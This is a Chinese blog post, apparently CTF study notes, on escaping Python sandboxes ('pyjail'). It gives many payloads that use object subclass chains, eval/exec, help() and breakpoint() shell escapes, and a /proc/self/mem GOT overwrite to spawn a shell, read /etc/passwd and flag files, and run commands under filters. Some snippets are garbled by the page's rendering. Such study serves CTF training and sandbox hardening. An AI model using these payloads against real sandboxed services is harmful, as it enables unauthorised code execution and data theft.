<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="所谓沙箱逃逸就是绕过模拟的python终端，最终实现命令执行 Pyjail基础解法，payload构造导入模块 os.system() os.popen() commands.getstatusoutput() commands.getoutput() commands.getstatus() subprocess.call(command, shell&#x3D;True) subprocess.Pope">
<meta property="og:type" content="article">
<meta property="og:title" content="python沙箱逃逸">
<meta property="og:url" content="https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/index.html">
<meta property="og:site_name" content="青云阁">
<meta property="og:description" content="所谓沙箱逃逸就是绕过模拟的python终端，最终实现命令执行 Pyjail基础解法，payload构造导入模块 os.system() os.popen() commands.getstatusoutput() commands.getoutput() commands.getstatus() subprocess.call(command, shell&#x3D;True) subprocess.Pope">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-05-09T11:08:15.000Z">
<meta property="article:modified_time" content="2025-05-09T11:45:12.923Z">
<meta property="article:author" content="YUNiversity">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="pyjail">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>python沙箱逃逸</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="青云阁" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">文章</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://ayuniversity.github.io/links/">友链</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2025/05/09/SSRF%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BBRedis/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2025/05/09/vm%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&text=python沙箱逃逸"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&is_video=false&description=python沙箱逃逸"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=python沙箱逃逸&body=Check out this article: https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&name=python沙箱逃逸&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&t=python沙箱逃逸"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Pyjail%E5%9F%BA%E7%A1%80%E8%A7%A3%E6%B3%95%EF%BC%8Cpayload%E6%9E%84%E9%80%A0"><span class="toc-number">1.</span> <span class="toc-text">Pyjail基础解法，payload构造</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80payload"><span class="toc-number">1.0.0.0.0.1.</span> <span class="toc-text">基础payload</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E7%9A%84%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%E4%B8%BE%E4%BE%8B"><span class="toc-number">1.0.0.0.0.2.</span> <span class="toc-text">其他的危险函数举例</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1%E6%9D%A5%E5%BC%95%E7%94%A8"><span class="toc-number">1.0.0.0.0.3.</span> <span class="toc-text">创建对象来引用</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E9%97%B4%E6%8E%A5%E5%BC%95%E7%94%A8"><span class="toc-number">1.0.0.0.0.4.</span> <span class="toc-text">间接引用</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pyjail%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="toc-number">2.</span> <span class="toc-text">Pyjail绕过方法</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">基于长度限制的绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#help"><span class="toc-number">2.2.</span> <span class="toc-text">help</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#breakpoint"><span class="toc-number">2.3.</span> <span class="toc-text">breakpoint()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%9A%E6%AC%A1%E4%BA%A4%E4%BA%92%E8%BF%9B%E8%A1%8C%E6%8B%BC%E6%8E%A5"><span class="toc-number">2.4.</span> <span class="toc-text">多次交互进行拼接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8C%B9%E9%85%8D%E8%BF%87%E6%BB%A4%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.5.</span> <span class="toc-text">基于字符串匹配过滤的绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E8%BF%94%E5%9B%9E"><span class="toc-number">2.6.</span> <span class="toc-text">函数返回</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8F%96%E6%95%B4"><span class="toc-number">2.7.</span> <span class="toc-text">字符串取整</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#len-dict-list"><span class="toc-number">2.8.</span> <span class="toc-text">len+dict+list</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bytes-type"><span class="toc-number">2.9.</span> <span class="toc-text">bytes&amp;type</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getattr%E5%87%BD%E6%95%B0"><span class="toc-number">2.10.</span> <span class="toc-text">getattr函数</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">3.</span> <span class="toc-text">基于多行限制的绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#compile"><span class="toc-number">3.1.</span> <span class="toc-text">compile</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%B7%E8%B1%A1%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">3.2.</span> <span class="toc-text">海象表达式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E6%A8%A1%E5%9D%97%E5%88%A0%E9%99%A4%E7%BB%95%E8%BF%87"><span class="toc-number">3.3.</span> <span class="toc-text">基于模块删除绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unicode%E7%BB%95%E8%BF%87"><span class="toc-number">3.4.</span> <span class="toc-text">unicode绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#input"><span class="toc-number">3.5.</span> <span class="toc-text">input</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-number">3.6.</span> <span class="toc-text">获取全局变量的方法</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        python沙箱逃逸
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">YUNiversity</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-05-09T11:08:15.000Z" class="dt-published" itemprop="datePublished">2025-05-09</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/">沙箱逃逸</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Web/" rel="tag">Web</a>, <a class="p-category" href="/tags/pyjail/" rel="tag">pyjail</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p><strong>所谓沙箱逃逸就是绕过模拟的python终端，最终实现命令执行</strong></p>
<h1 id="Pyjail基础解法，payload构造"><a href="#Pyjail基础解法，payload构造" class="headerlink" title="Pyjail基础解法，payload构造"></a><strong>Pyjail基础解法，payload构造</strong></h1><p>导入模块</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">os.system() os.popen()
commands.getstatusoutput() commands.getoutput()
commands.getstatus()
subprocess.call(command, shell=True) subprocess.Popen(command, shell=True)
pty.spawn()
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="基础payload"><a href="#基础payload" class="headerlink" title="基础payload"></a>基础payload</h6><pre class="line-numbers language-language-python"><code class="language-language-python">print(open('/flag').read())
__import__('os').system('sh')
#读文件
().__class__.__bases__[0].__subclasses__()[40]('\etc\password').read()
#写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input','w').write('')
#执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()')
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="其他的危险函数举例"><a href="#其他的危险函数举例" class="headerlink" title="其他的危险函数举例"></a><strong>其他的危险函数举例</strong></h6><p><strong>execfile</strong> 文件执行 </p>
<pre class="line-numbers language-language-python"><code class="language-language-python">>>> execfile('/usr/lib/python2.7/os.py')
>>> system('cat /etc/passwd')
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
>>> getcwd()
'/usr/lib/python2.7'
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>timeit</strong></p>
<pre class="line-numbers language-language-python"><code class="language-language-python">import timeit
timeit.timeit("__import__('os').system('dir')",number=1)
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>eval和evec</strong></p>
<pre class="line-numbers language-language-python"><code class="language-language-python">eval('__import__("os").system("dir")')
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<pre class="line-numbers language-language-python"><code class="language-language-python">eval(expression[, globals[, locals]])
exec(expression[, globals[, locals]])
'''
用法基本相似，expression执行表达式，
globals全局变量(必须字典)，
locals局部变量(任意mapping object，一般是字典)
不同点：
eval将表达式计算出来，结果返回，不会影响当前环境
exec将表达式作为py语句运行，可以进行赋值等操作(题目中不常见)
eval 与 exec 的区别再于 exec 允许 \n 和 ； 进行换行，而 eval 不允许。并且 exec 不会将结果输出出来，而 eval 会。'''
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>使<strong>globals，locals为空字典</strong>访问不到全局变量和局部变量，从而构造沙箱</p>
<p><strong>ast.literal_eval</strong>更加的安全，因此题目碰到这个基本就不是沙箱逃逸了</p>
<p>正常的 Python 沙箱会以黑名单的形式禁止使用一些模块如 os 或以白名单的形式只允许用户使用沙箱提供的模块，用以阻止用户的危险操作。而如何进一步逃逸沙箱就是我们的重点研究内容。</p>
<p>当我们不能导入模块，或者想要导入的模块被禁，那么我们只能寻求 Python 本身内置函数可以通过**dir(<strong>builtins</strong>)**来获取内置函数列表 </p>
<p>在 Python 中，不引入直接使用的内置函数被成为 <strong>builtin</strong> 函数，随着 <strong>builtin</strong> 这个模块自动引入到环境中</p>
<p>我们可以通过 <strong>dict</strong> 引入我们想要引入的模块。<strong>dict</strong> 的作用是列出一个模组 / 类 / 对象 下面 所有的属性和函数eg：m.dict[“x”]</p>
<p>举个 实例</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">__builtins__.__dict__['X19pbXBvcnRfXw=='.decode('base64')]('b3M='.decode('base64'))
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>这里的base64编码分别是__import__和os</p>
<p><em>如果一些 内敛函数在</em> <strong>builtins</strong> <em>删除 ，我们可以通过 reload(<em><strong>builtins</strong></em>) 重新载入获取一个完整的</em> <strong>builtins</strong></p>
<h6 id="创建对象来引用"><a href="#创建对象来引用" class="headerlink" title="创建对象来引用"></a><strong>创建对象来引用</strong></h6><p>我们有常见的两个方法：</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">().__class__.__bases__[0]
''.__class__.__mro__[2]
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><strong>常见 payload</strong></p>
<pre class="line-numbers language-language-python"><code class="language-language-python">#读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()

#写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')

#执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="间接引用"><a href="#间接引用" class="headerlink" title="间接引用"></a><strong>间接引用</strong></h6><p>在有些题目中，如2018 年国赛的 Python 沙盒题目上，import 其实整个是被阉割了。但是在 Python 中，原生的 <strong>import</strong> 是存在被引用的，只要我们找到相关对象引用就可以进一步获取我们想要的内容，具体下面的会讲述到</p>
<p><strong>write 修改 got 表</strong> </p>
<p>实际上是一个 <strong>/proc/self/mem</strong> 的内存操作方法 <strong>/proc/self/mem</strong> 是内存镜像，能够通过它来读写到进程的所有内存，包括可执行代码，如果我们能获取到 Python 一些函数的偏移，如 <strong>system</strong> ，我们便可以通过覆写 got 表达到 getshell 的目的。 </p>
<pre class="line-numbers language-language-python"><code class="language-language-python">(lambda r,w:r.seek(0x08de2b8) or w.seek(0x08de8c8) or w.write(r.read(8)) or ().__class__.__bases__[0].__subclasses__()[40]('c'+'at /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb'))(().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem','r'),().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem', 'w', 0))
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>第一个地址是 system 的偏移，第二个是 fopen 的偏移，我们可以通过 <strong>objdump</strong> 获取相关信息 ，这里并没有搞懂放个例子便于以后理解本质</p>
<p>eg：</p>
<p>2018 ciscn 全国大学生信息安全竞赛中的 Python 沙箱逃逸。 我们可以通过</p>
<p><strong>print ().<strong>class</strong>.<strong>bases</strong>[0].<strong>subclasses</strong>()<a href="%22/home/ctf/sandbox.py%22">40</a>.read()</strong> 获取题目源码，然后可以进一步分析，以下提供三种逃逸方法。</p>
<p><strong>1.创建对象并利用 Python 操作字符串的特性</strong></p>
<pre class="line-numbers language-language-python"><code class="language-language-python">x = [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'ca'+'tch_warnings'][0].__init__
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('l'+'s /home/ctf')
x.__getattribute__("func_global"+"s")['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>2.劫持 got 表 getshell</strong></p>
<pre><code>(lambda r,w:r.seek(0x08de2b8) or w.seek(0x08de8c8) or w.write(r.read(8)) or ().__class__.__bases__[0].__subclasses__()[40]('l'+'s /home/ctf/'))(().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem','r'),().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem', 'w', 0))
(lambda r,w:r.seek(0x08de2b8) or w.seek(0x08de8c8) or w.write(r.read(8)) or ().__class__.__bases__[0].__subclasses__()[40]('c'+'at /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb'))(().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem','r'),().__class__.__bases__[0].__subclasses__()[40]('/proc/self/mem', 'w', 0))
</code></pre>
<p><strong>3.寻找 import 的间接引用</strong> <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/sandbox/python/python-sandbox-escape/#import"><strong>¶</strong></a></p>
<p>在不断的 dir 过程中，发现 <strong>closure</strong> 这个 object 保存了参数，可以引用原生的 <strong>import</strong> </p>
<pre class="line-numbers language-language-python"><code class="language-language-python">print __import__.__getattribute__('__clo'+'sure__')[0].cell_contents('o'+'s').__getattribute__('sy'+'stem')('l'+'s home') 
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="Pyjail绕过方法"><a href="#Pyjail绕过方法" class="headerlink" title="Pyjail绕过方法"></a><strong>Pyjail绕过方法</strong></h1><h2 id="基于长度限制的绕过"><a href="#基于长度限制的绕过" class="headerlink" title="基于长度限制的绕过"></a><strong>基于长度限制的绕过</strong></h2><h2 id="help"><a href="#help" class="headerlink" title="help"></a><strong>help</strong></h2><p>输入help()，这里字符串长度6会进入正常调用eval函数，在help交互式下，输入任意模块名称得该模块的帮助文档，如sys，在Linux中，呈现帮助文档时，实际调用系统的less或more命令，利用这两个命令执行本地命令特性获取shell，继续按#！，执行外部命令sh即可(!ls,!cat flag)</p>
<h2 id="breakpoint"><a href="#breakpoint" class="headerlink" title="breakpoint()"></a><strong>breakpoint()</strong></h2><p>该函数在程序执行任何位置调用，当程序执行到这个位置时，它将暂停并打开交互式调试器 list input_data = <strong>import</strong>(‘os’).system(‘sh’)</p>
<h2 id="多次交互进行拼接"><a href="#多次交互进行拼接" class="headerlink" title="多次交互进行拼接"></a><strong>多次交互进行拼接</strong></h2><p>“_”函数字符拼接</p>
<p>‘00’</p>
<p>_+’ aaa’</p>
<p><em>+’ bbb’ eval(</em>)</p>
<h2 id="基于字符串匹配过滤的绕过"><a href="#基于字符串匹配过滤的绕过" class="headerlink" title="基于字符串匹配过滤的绕过"></a><strong>基于字符串匹配过滤的绕过</strong></h2><p>所有数字被禁用</p>
<h2 id="函数返回"><a href="#函数返回" class="headerlink" title="函数返回"></a><strong>函数返回</strong></h2><p>0：int(bool([]))，Flase，len([])，any(())</p>
<p>1：int(bool([“”]))，True，all(())，int(list(dict(aɔ=())).pop()).pop())</p>
<h2 id="字符串取整"><a href="#字符串取整" class="headerlink" title="字符串取整"></a><strong>字符串取整</strong></h2><p>len(repr(True))，len(repr(bytearray))</p>
<h2 id="len-dict-list"><a href="#len-dict-list" class="headerlink" title="len+dict+list"></a><strong>len+dict+list</strong></h2><p>0-&gt;len([])</p>
<p>2-&gt;len(list(dict(aa=()))[len([])])</p>
<p>3-&gt;len(list(dict(aaa=()))[len([])])</p>
<h2 id="bytes-type"><a href="#bytes-type" class="headerlink" title="bytes&amp;type"></a><strong>bytes&amp;type</strong></h2><p>bytes = type(str(1).encode())</p>
<p>以system(“cat flag”)为例： [].<strong>class</strong>.<strong>mro</strong>[-1].<strong>subclasses</strong>()[-4].<strong>init</strong>.<strong>globals</strong>(bytes([115])+bytes([121])+bytes([115])+bytes([116])+bytes([101])+bytes([109])).decode()</p>
<p>以system(“ls”)为例： [].<strong>class</strong>.<strong>mro</strong>[-1].<strong>subclasses</strong>()[-4].<strong>init</strong>.<strong>globals</strong>(type(str(1).encode())([115])+type(str(1).encode())([121])+type(str(1).encode())([115])+type(str(1).encode())([116])+type(str(1).encode())([101])+type(str(1).encode())([109])).decode()属性名，过滤class，import等</p>
<h2 id="getattr函数"><a href="#getattr函数" class="headerlink" title="getattr函数"></a><strong>getattr函数</strong></h2><p>获取对象属性和方法,可以代替.</p>
<p><strong>__getattribute__函数</strong></p>
<p><strong>__getattr__函数</strong></p>
<p><strong>__globals__替换</strong></p>
<p><strong>mro,bases,__base__互换</strong></p>
<h1 id="基于多行限制的绕过"><a href="#基于多行限制的绕过" class="headerlink" title="基于多行限制的绕过"></a><strong>基于多行限制的绕过</strong></h1><p><strong>exec</strong></p>
<p>eval(“exec(‘import(“os”)\nprint(1)’)”)</p>
<h2 id="compile"><a href="#compile" class="headerlink" title="compile"></a><strong>compile</strong></h2><p>eval(‘’’eval(compile(‘print(“hello world”);print(“heyy”)’,’’,’exec’))’’’)</p>
<h2 id="海象表达式"><a href="#海象表达式" class="headerlink" title="海象表达式"></a><strong>海象表达式</strong></h2><p>eval(‘[a:=<strong>import</strong>(“os”),b:=a.system(“id”)]’)</p>
<h2 id="基于模块删除绕过"><a href="#基于模块删除绕过" class="headerlink" title="基于模块删除绕过"></a><strong>基于模块删除绕过</strong></h2><p>基于继承链获取</p>
<p>所有类的基类都是object</p>
<p>查看变量所属的类(().<strong>class</strong>)</p>
<p>根据变量的类得到其所属的类(().<strong>class</strong>.<strong>bases</strong>)</p>
<p>反查object类的子类组成列表(().<strong>class</strong>.<strong>bases</strong>[0].<strong>subclasses</strong>())</p>
<p>(().<strong>class</strong>.<strong>base</strong>.<strong>subclasses</strong>())</p>
<p>获取当前Python环境中所有对象的子类列表</p>
<p>[].<strong>class</strong>.<strong>base</strong>.<strong>subclasses</strong>()[40]获得第40个子类</p>
<p>python2与python3差异</p>
<p>python2中file类可以直接用来读取文件</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">[].class.bases[0].subclasses()40.read()
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>python3中file类已经没有了，用读取文件</p>
<pre class="line-numbers language-language-python"><code class="language-language-python"><class'_frozen_importlib_external.FileLoader'>读取文件
{{().class.bases[0].subclasses()[79]"get_data"}}
{{().class.bases[0].subclasses()79.communicate()[0]}}
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>内建函数eval函数执行命令</p>
<pre class="line-numbers language-language-python"><code class="language-language-python">{{".class.bases[0].subclasses()[166].init.globals__['builtins']'eval'}}
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>几个含有eval函数的类：</p>
<p>warings.catch_warnings</p>
<p>WaringMessage</p>
<p>codecs.IncrementalEncoder</p>
<p>codecs.IncrementalDecoder</p>
<p>codecs.StreamReaderWriter</p>
<p>os._wrap_close</p>
<p>reprlib.Repr</p>
<p>weakref.finalize</p>
<h2 id="unicode绕过"><a href="#unicode绕过" class="headerlink" title="unicode绕过"></a><strong>unicode绕过</strong></h2><p>Python3开始支持非ASCII字符的标识符，也就是说，可以使用Unicode字符作为Python变量名，函数名等。python在解析代码时，可以使用Unicode Normalization From KC(NTKC)规范化算法，将一些视觉上相似的Unicode字符统一为一个标准化</p>
<h2 id="input"><a href="#input" class="headerlink" title="input"></a><strong>input</strong></h2><p>python2中，input函数从标准输入接收输入并自动eval求值，返回所求值；raw_input函数从标准输入接收输入，返回输入字符串</p>
<p>python3中，input函数从标准输入接收输入返回输入字符串</p>
<p>python2 input() = python2 eval(raw_input()) = python3 eval(input())</p>
<p>对于python2的input,相当于存在命令执行，可以rce</p>
<h2 id="获取全局变量的方法"><a href="#获取全局变量的方法" class="headerlink" title="获取全局变量的方法"></a><strong>获取全局变量的方法</strong></h2><p>函数利用：vars()，globals()</p>
<p>help()：进入help，查__main__</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">文章</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://ayuniversity.github.io/links/">友链</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    
